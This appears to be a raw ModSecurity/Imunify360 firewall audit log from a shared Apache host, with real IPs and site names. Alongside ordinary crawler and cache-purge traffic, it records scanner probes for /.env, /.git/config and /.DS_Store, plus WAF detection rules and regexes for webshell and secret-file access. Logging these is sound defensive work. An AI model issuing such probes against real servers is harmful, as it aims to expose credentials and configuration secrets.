1751276702215372 9805394 (- - -) Stopwatch2: 1751276702215372 9805394; combined=3539, p1=147, p2=3228, p3=0, p4=0, p5=164, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a2cf991d-Z-- --38c57b59-A-- [30/Jun/2025:15:15:13.217416 +0530] aGJco-8vLCNE6Q6vc6J0DQAAAB8 103.185.74.40 36743 192.168.74.40 443 --38c57b59-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --38c57b59-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --38c57b59-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751276707320521 5897495 (- - -) Stopwatch2: 1751276707320521 5897495; combined=2919, p1=109, p2=2640, p3=0, p4=0, p5=169, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --38c57b59-Z-- --93edd609-A-- [30/Jun/2025:15:15:14.510228 +0530] aGJcqs1aszZdy4pWyr_gNQAAAAU 20.171.207.232 47512 192.168.74.40 443 --93edd609-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-delhi/js/images/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --93edd609-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --93edd609-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --28dc4572-Z-- --785b3961-A-- [30/Jun/2025:16:02:29.171434 +0530] aGJnvL0-LYxD8fEOwEFJ9gAAADs 157.245.2.32 41384 192.168.74.40 443 --785b3961-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --785b3961-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --785b3961-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279548618126 553645 (- - -) Stopwatch2: 1751279548618126 553645; combined=949, p1=110, p2=683, p3=0, p4=0, p5=156, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --785b3961-Z-- --3fb8d63f-A-- [30/Jun/2025:16:02:30.091134 +0530] aGJnvt1FYARPUJaTrtcibgAAABE 20.171.207.232 57438 192.168.74.40 443 --3fb8d63f-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/hotels-pushkar.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3fb8d63f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3fb8d63f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/hotels-pushkar.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/hotels-pushkar.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279550076566 14713 (- - -) Stopwatch2: 1751279550076566 14713; combined=3213, p1=130, p2=2953, p3=0, p4=0, p5=130, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3fb8d63f-Z-- --31629b0a-A-- [30/Jun/2025:16:02:30.922745 +0530] aGJnvnFTGXvjyjW5zx4ZEgAAAC8 157.245.2.32 41396 192.168.74.40 443 --31629b0a-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --31629b0a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --31629b0a-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279550879835 43123 (- - -) Stopwatch2: 1751279550879835 43123; combined=3794, p1=89, p2=3510, p3=0, p4=0, p5=195, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --31629b0a-Z-- --3b5af035-A-- [30/Jun/2025:16:02:31.290971 +0530] aGJnv91FYARPUJaTrtcibwAAABE 20.171.207.232 57438 192.168.74.40 443 --3b5af035-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/parks-sanctuary.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3b5af035-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3b5af035-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/parks-sanctuary.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/js/js/images/js/parks-sanctuary.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751279551276746 14436 (- - -) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280291211105 15620 (- - -) Stopwatch2: 1751280291211105 15620; combined=2794, p1=121, p2=2488, p3=0, p4=0, p5=184, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84976115-Z-- --10cf4266-A-- [30/Jun/2025:16:14:51.399173 +0530] aGJqoWsIFWODA-g8zvRMywAAABI 103.185.74.40 56596 192.168.74.40 443 --10cf4266-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --10cf4266-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --10cf4266-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280289838107 1561543 (- - -) Stopwatch2: 1751280289838107 1561543; combined=2750, p1=229, p2=2288, p3=0, p4=0, p5=233, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --10cf4266-Z-- --16150b01-A-- [30/Jun/2025:16:14:52.384022 +0530] aGJqpJSz5945UOocZnMHewAAAFk 20.171.207.232 56970 192.168.74.40 443 --16150b01-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/Travel-Tips.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --16150b01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --16150b01-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280292368027 16144 (- - -) Stopwatch2: 1751280292368027 16144; combined=2990, p1=152, p2=2715, p3=0, p4=0, p5=123, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --16150b01-Z-- --a1c63a53-A-- [30/Jun/2025:16:14:53.033061 +0530] aGJqowXezhjJpVloWYQ87QAAAAI 103.185.74.40 5892 192.168.74.40 443 --a1c63a53-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a1c63a53-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a1c63a53-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280291608216 1425303 (- - -) Stopwatch2: 1751280291608216 1425303; combined=3312, p1=106, p2=3001, p3=0, p4=0, p5=204, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a1c63a53-Z-- --fde6a30b-A-- [30/Jun/2025:16:14:54.760169 +0530] aGJqppSz5945UOocZnMHfQAAAFk 20.171.207.232 56970 192.168.74.40 443 --fde6a30b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/Distance-Chart-Rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --fde6a30b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fde6a30b-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2b0ba674-Z-- --e8c87460-A-- [30/Jun/2025:16:21:12.595008 +0530] aGJsIHA1bJj51dVnlb9_JQAAADE 192.253.209.86 15953 192.168.74.40 443 --e8c87460-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --e8c87460-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e8c87460-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280672550455 44931 (- - -) Stopwatch2: 1751280672550455 44931; combined=3482, p1=84, p2=3218, p3=0, p4=0, p5=179, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e8c87460-Z-- --b82d0129-A-- [30/Jun/2025:16:21:12.712455 +0530] aGJsIHlYJ9hwaTEGCmB7-AAAAAA 20.171.207.232 42430 192.168.74.40 443 --b82d0129-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/aainag/js/large.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b82d0129-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b82d0129-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/aainag/js/large.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/aainag/js/large.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280672696079 16693 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --95ac250c-Z-- --3c517a4b-A-- [30/Jun/2025:16:21:15.242489 +0530] aGJsI1R_wtNLnY2uQolOuQAAAAE 192.253.209.104 7211 192.168.74.40 443 --3c517a4b-B-- GET /.DS_Store HTTP/1.1 Host: 103.185.74.40 User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --3c517a4b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3c517a4b-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.DS_Store||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280675197148 45800 (- - -) Stopwatch2: 1751280675197148 45800; combined=3431, p1=81, p2=3137, p3=0, p4=0, p5=212, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3c517a4b-Z-- --df311717-A-- [30/Jun/2025:16:21:15.611015 +0530] aGJsHcrsqADc0ksUEO1GjwAAABo 57.141.0.27 42542 192.168.74.40 443 --df311717-B-- GET /product-tag/georgette/?filter_color=blue%2Cred%2Corange%2Cgreen%2Cyellow&query_type_color=or&filter_size=xl%2Cl%2Cxxl&query_type_size=or HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: thecouturelove.com Connection: keep-alive --df311717-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Link: <https://thecouturelove.com/wp-json/>; rel="https://api.w.org/", <https://thecouturelove.com/wp-json/wp/v2/product_tag/326>; rel="alternate"; title="JSON"; type="application/json" Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --df311717-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:filter_color=blue,red,orange,green,yellow&query_type_color=or&filter_size=xl,l,xxl&query_type_size=or& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3a6e5964-Z-- --6f975970-A-- [30/Jun/2025:16:22:19.093324 +0530] aGJsYjA1GQQmfaJnR0hFSgAAABw 192.253.209.100 13299 192.168.74.40 443 --6f975970-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --6f975970-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --6f975970-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280738548058 545331 (- - -) Stopwatch2: 1751280738548058 545331; combined=734, p1=84, p2=525, p3=0, p4=0, p5=125, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6f975970-Z-- --a65bc220-A-- [30/Jun/2025:16:22:19.662180 +0530] aGJsY3lYJ9hwaTEGCmB8MQAAAAA 20.171.207.232 42430 192.168.74.40 443 --a65bc220-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/images/hotels-bharatpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a65bc220-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a65bc220-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/images/hotels-bharatpur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/images/hotels-bharatpur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280739646845 15523 (- - -) Stopwatch2: 1751280739646845 15523; combined=2989, p1=188, p2=2661, p3=0, p4=0, p5=139, sr=54, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ba80c55a-Z-- --abc60d01-A-- [30/Jun/2025:16:23:18.397335 +0530] aGJsnZcYrMYXFCPDIOKDYgAAAEE 192.253.209.82 2935 192.168.74.40 443 --abc60d01-B-- POST /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --abc60d01-C-- 0x%5B%5D=DTAB --abc60d01-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --abc60d01-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280797825678 572343 (- - -) Stopwatch2: 1751280797825678 572343; combined=1401, p1=119, p2=1034, p3=0, p4=0, p5=248, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --abc60d01-Z-- --4c1e073a-A-- [30/Jun/2025:16:23:19.424753 +0530] aGJsn-g_3_MU1Jta0WaT_QAAACo 20.171.207.232 47454 192.168.74.40 443 --4c1e073a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --4c1e073a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: 